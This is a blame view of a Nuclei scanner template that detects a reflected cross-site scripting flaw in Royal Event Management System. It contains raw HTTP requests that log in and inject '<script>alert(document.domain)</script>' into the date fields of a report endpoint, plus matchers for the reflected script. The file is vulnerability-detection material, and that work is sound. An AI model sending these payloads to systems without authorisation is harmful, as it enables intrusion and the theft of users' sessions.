daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/royalevent/royalevent-management-xss.yaml

76 lines
2.6 KiB
YAML
Raw Normal View History

Create royalevent-management-xss.yaml
2022-06-23 07:08:09 +00:00
id: royalevent-management-xss
info:
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements
2022-09-23 17:53:08 +00:00
name: Royal Event Management System - Cross-Site Scripting
Create royalevent-management-xss.yaml
2022-06-23 07:08:09 +00:00
author: ritikchaddha
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements
2022-09-23 17:53:08 +00:00
severity: high
Create royalevent-management-xss.yaml
2022-06-23 07:08:09 +00:00
description: |
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements
2022-09-23 17:53:08 +00:00
Royal Event Management System contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Create royalevent-management-xss.yaml
2022-06-23 07:08:09 +00:00
reference:
- https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
Dashboard Content Enhancements (#5455) Dashboard Content Enhancements
2022-09-23 17:53:08 +00:00
- https://packetstormsecurity.com/files/166479/Royale-Event-Management-System-1.0-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
Update royalevent-management-xss.yaml
2022-06-23 18:35:48 +00:00
metadata:
verified: true
templateman update
2023-10-14 11:27:55 +00:00
max-request: 2
tags: cms,royalevent,packetstorm,xss,authenticated,intrusive
Create royalevent-management-xss.yaml
2022-06-23 07:08:09 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-04-27 04:28:59 +00:00
http:
Create royalevent-management-xss.yaml
2022-06-23 07:08:09 +00:00
- raw:
- |
POST /royal_event/ HTTP/1.1
Host: {{Hostname}}
Content-Length: 353
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="username"
{{username}}
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="password"
{{password}}
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="login"
------WebKitFormBoundaryCSxQll1eihcqgIgD--
- |
POST /royal_event/btndates_report.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition: form-data; name="todate"
2022-12-22<script>alert(document.domain)</script>
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition: form-data; name="search"
3
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition: form-data; name="fromdate"
2022-06-22<script>alert(document.domain)</script>
------WebKitFormBoundaryFboH5ITu7DsGIGrD--
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.domain)</script>"
Update royalevent-management-xss.yaml
2022-06-23 18:35:48 +00:00
- "Report from "
condition: and
- type: word
part: header
words:
- text/html
Create royalevent-management-xss.yaml
2022-06-23 07:08:09 +00:00
- type: status
status:
- 200
Auto Template Signing [Mon Nov 27 10:10:24 UTC 2023] :robot:
2023-11-27 10:10:24 +00:00
# digest: 4a0a00473045022100ace6ec60e88c58fd79ba10ee855e56475b3e9002e669219ec6e30a9ce4be8242022017306dbd2e366545a2a90e5a18f5d932f9e869f7095d388632fce6ac98e4732e:922c64590222798bb761d5b6d8e72950